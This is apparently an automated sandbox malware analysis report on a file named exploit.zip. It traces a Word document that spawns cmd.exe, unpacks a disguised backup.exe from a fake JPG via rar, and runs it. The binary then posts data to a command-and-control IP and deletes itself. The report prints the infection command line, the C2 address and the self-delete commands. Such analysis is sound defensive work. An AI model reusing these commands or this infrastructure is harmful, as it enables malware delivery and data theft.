Analysis Report exploit.zip

Overview

General Information

Joe Sandbox Version:	24.0.0 Fire Opal
Analysis ID:	15782
Start date:	06.12.2018
Start time:	22:27:46
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 3m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	exploit.zip
Cookbook file name:	Submit other files along with the sample-affeafe0002e6aa7f0d03822e3c6fca3.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 20, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	EGA enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal48.expl.winZIP@14/13@0/1
Cookbook Comments:	Adjust boot time Found application associated with file extension: .zip
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryDirectoryFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	48	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control
Valid Accounts	Command-Line Interface1	Winlogon Helper DLL	Process Injection1	Process Injection1	Input Capture1	Process Discovery1	Application Deployment Software	Input Capture1	Data Compressed	Standard Non-Application Layer Protocol1
Replication Through Removable Media	Exploitation for Client Execution1	Port Monitors	Accessibility Features	Binary Padding	Network Sniffing	Security Software Discovery3	Remote Services	Data from Removable Media	Exfiltration Over Other Network Medium	Standard Application Layer Protocol11
Drive-by Compromise	Windows Management Instrumentation	Accessibility Features	Path Interception	Rootkit	Input Capture	System Information Discovery2	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Custom Cryptographic Protocol

Signature Overview

Click to jump to signature section

Exploits:

Microsof Office program loads Macromedia Flash Player

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: C:\Windows\system32\Macromed\Flash\Flash64_22_0_0_168.ocx	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: C:\Windows\system32\Macromed\Flash\Flash64_22_0_0_168.ocx	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: C:\Windows\system32\Macromed\Flash\Flash64_22_0_0_168.ocx	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: C:\Windows\system32\Macromed\Flash\Flash64_22_0_0_168.ocx	Jump to behavior

Spreading:

Creates COM task schedule object (often to register a task for autostart)

Show sources

Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_CURRENT_USER_CLASSES\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\Progid	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\Progid	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\ProgID	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\Progid	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\Progid	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\ProgID	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_CURRENT_USER_CLASSES\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAs	Jump to behavior

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\cmd.exe

Jump to behavior

Networking:

Connects to IPs without corresponding DNS lookups

Show sources

Source: unknown	TCP traffic detected without corresponding DNS query: 188.241.58.68
Source: unknown	TCP traffic detected without corresponding DNS query: 188.241.58.68
Source: unknown	TCP traffic detected without corresponding DNS query: 188.241.58.68
Source: unknown	TCP traffic detected without corresponding DNS query: 188.241.58.68
Source: unknown	TCP traffic detected without corresponding DNS query: 188.241.58.68
Source: unknown	TCP traffic detected without corresponding DNS query: 188.241.58.68
Source: unknown	TCP traffic detected without corresponding DNS query: 188.241.58.68
Source: unknown	TCP traffic detected without corresponding DNS query: 188.241.58.68

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic	HTTP traffic detected: POST /search HTTP/1.1Connection: Keep-AliveContent-Type: application/octet-streamAccept: /User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36Content-Length: 352Host: 188.241.58.68
Source: global traffic	HTTP traffic detected: POST /search HTTP/1.1Connection: Keep-AliveContent-Type: application/octet-streamAccept: /User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36Content-Length: 32Host: 188.241.58.68

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{564B0B18-3E65-4926-9AFE-73F55F2FD7DF}.tmp

Jump to behavior

Posts data to webserver

Show sources

Source: unknown

HTTP traffic detected: POST /search HTTP/1.1Connection: Keep-AliveContent-Type: application/octet-streamAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36Content-Length: 352Host: 188.241.58.68

Urls found in memory or binary data

Show sources

Source: backup.exe.5.dr	String found in binary or memory: http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07
Source: backup.exe.5.dr	String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: backup.exe.5.dr	String found in binary or memory: http://pki-ocsp.symauth.com0
Source: backup.exe.5.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: backup.exe.5.dr	String found in binary or memory: http://t2.symcb.com0
Source: backup.exe.5.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: backup.exe.5.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: backup.exe.5.dr	String found in binary or memory: http://tl.symcd.com0&
Source: backup.exe.5.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: backup.exe.5.dr	String found in binary or memory: https://www.thawte.com/repository0W

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global mouse hook

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Windows user hook set: 0 mouse low level C:\Windows\system32\dinput8.dll

Jump to behavior

System Summary:

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Show sources

Source: C:\Program Files (x86)\WinRAR\Rar.exe	Memory allocated: 772A0000 page execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\WinRAR\Rar.exe	Memory allocated: 773C0000 page execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\WinRAR\Rar.exe	Memory allocated: 772A0000 page execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\WinRAR\Rar.exe	Memory allocated: 773C0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Memory allocated: 772A0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Memory allocated: 773C0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\NVIDIAControlPanel\NVIDIAControlPanel.exe	Memory allocated: 772A0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\NVIDIAControlPanel\NVIDIAControlPanel.exe	Memory allocated: 773C0000 page execute and read and write	Jump to behavior

PE file contains strange resources

Show sources

Source: backup.exe.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: backup.exe.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Show sources

Source: C:\Program Files (x86)\WinRAR\Rar.exe	Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll			Jump to behavior
Source: C:\Program Files (x86)\WinRAR\Rar.exe	Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll			Jump to behavior

Classification label

Show sources

Source: classification engine

Classification label: mal48.expl.winZIP@14/13@0/1

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$22.docx

Jump to behavior

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user~1\AppData\Local\Temp\CVRB1B2.tmp

Jump to behavior

Found command line output

Show sources

Source: C:\Windows\System32\cmd.exe	Console Write: ..................CJ....................................@cGJ..... ........'.............4..w..............'.............X.......................	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ................................p3B.......#.......#............._B.s....P$.s....p.#.....t.......................................................	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ................................................................_B.s.......................s......#.............................................	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ................................A.c.c.e.s.s. .i.s. .d.e.n.i.e.d...................#........~....................X.#.....&.......................	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: .................................3;.......$.....0.$............._B.s.....3;.......4.t...........0...............................................	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ................................C.:.\.U.s.e.r.s.\.A.L.F.O.N.S.~.1.\.D.e.s.k.t.o.p.\.b.a.c.k.u.p...e.x.e...........$.....L.......l...............	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ....................x...........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........x.......`.$........~......................$.....&.......................	Jump to behavior

Queries process information (via WMI, Win32_Process)

Show sources

Source: C:\Users\user\Desktop\backup.exe

WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Program Files (x86)\WinRAR\Rar.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\22.docx
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\WINDOWS\system32\cmd.exe /c set path=%ProgramFiles(x86)%\WinRAR;C:\Program Files\WinRAR; && cd /d %~dp0 & rar.exe e -o+ -r -inul *.rar scan042.jpg & rar.exe e -o+ -r -inul scan042.jpg backup.exe & backup.exe
Source: unknown	Process created: C:\Program Files (x86)\WinRAR\Rar.exe rar.exe e -o+ -r -inul *.rar scan042.jpg
Source: unknown	Process created: C:\Program Files (x86)\WinRAR\Rar.exe rar.exe e -o+ -r -inul scan042.jpg backup.exe
Source: unknown	Process created: C:\Users\user\Desktop\backup.exe backup.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\NVIDIAControlPanel\NVIDIAControlPanel.exe C:\Users\user~1\AppData\Local\NVIDIA~1\NVIDIAControlPanel.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C choice /D n /T 10 \|\| rmdir /S /Q C:\Users\user~1\AppData\Local\NVIDIA~1
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C choice /D n /T 10 \|\| del /F /Q C:\Users\user~1\Desktop\backup.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe C:\WINDOWS\system32\cmd.exe /c set path=%ProgramFiles(x86)%\WinRAR;C:\Program Files\WinRAR; && cd /d %~dp0 & rar.exe e -o+ -r -inul *.rar scan042.jpg & rar.exe e -o+ -r -inul scan042.jpg backup.exe & backup.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\WinRAR\Rar.exe rar.exe e -o+ -r -inul *.rar scan042.jpg	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\WinRAR\Rar.exe rar.exe e -o+ -r -inul scan042.jpg backup.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\backup.exe backup.exe	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C choice /D n /T 10 \|\| rmdir /S /Q C:\Users\user~1\AppData\Local\NVIDIA~1	Jump to behavior
Source: C:\Users\user\Desktop\backup.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C choice /D n /T 10 \|\| del /F /Q C:\Users\user~1\Desktop\backup.exe	Jump to behavior

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Program Files (x86)\WinRAR\Rar.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Submission file is bigger than most known malware samples

Show sources

Source: exploit.zip

Static file information: File size 3375503 > 1048576

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Entry point lies outside standard sections

Show sources

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp1

PE file contains sections with non-standard names

Show sources

Source: backup.exe.5.dr	Static PE information: section name: .vmp0
Source: backup.exe.5.dr	Static PE information: section name: .vmp1

Persistence and Installation Behavior:

Drops PE files

Show sources

Source: C:\Program Files (x86)\WinRAR\Rar.exe

File created: C:\Users\user\Desktop\backup.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
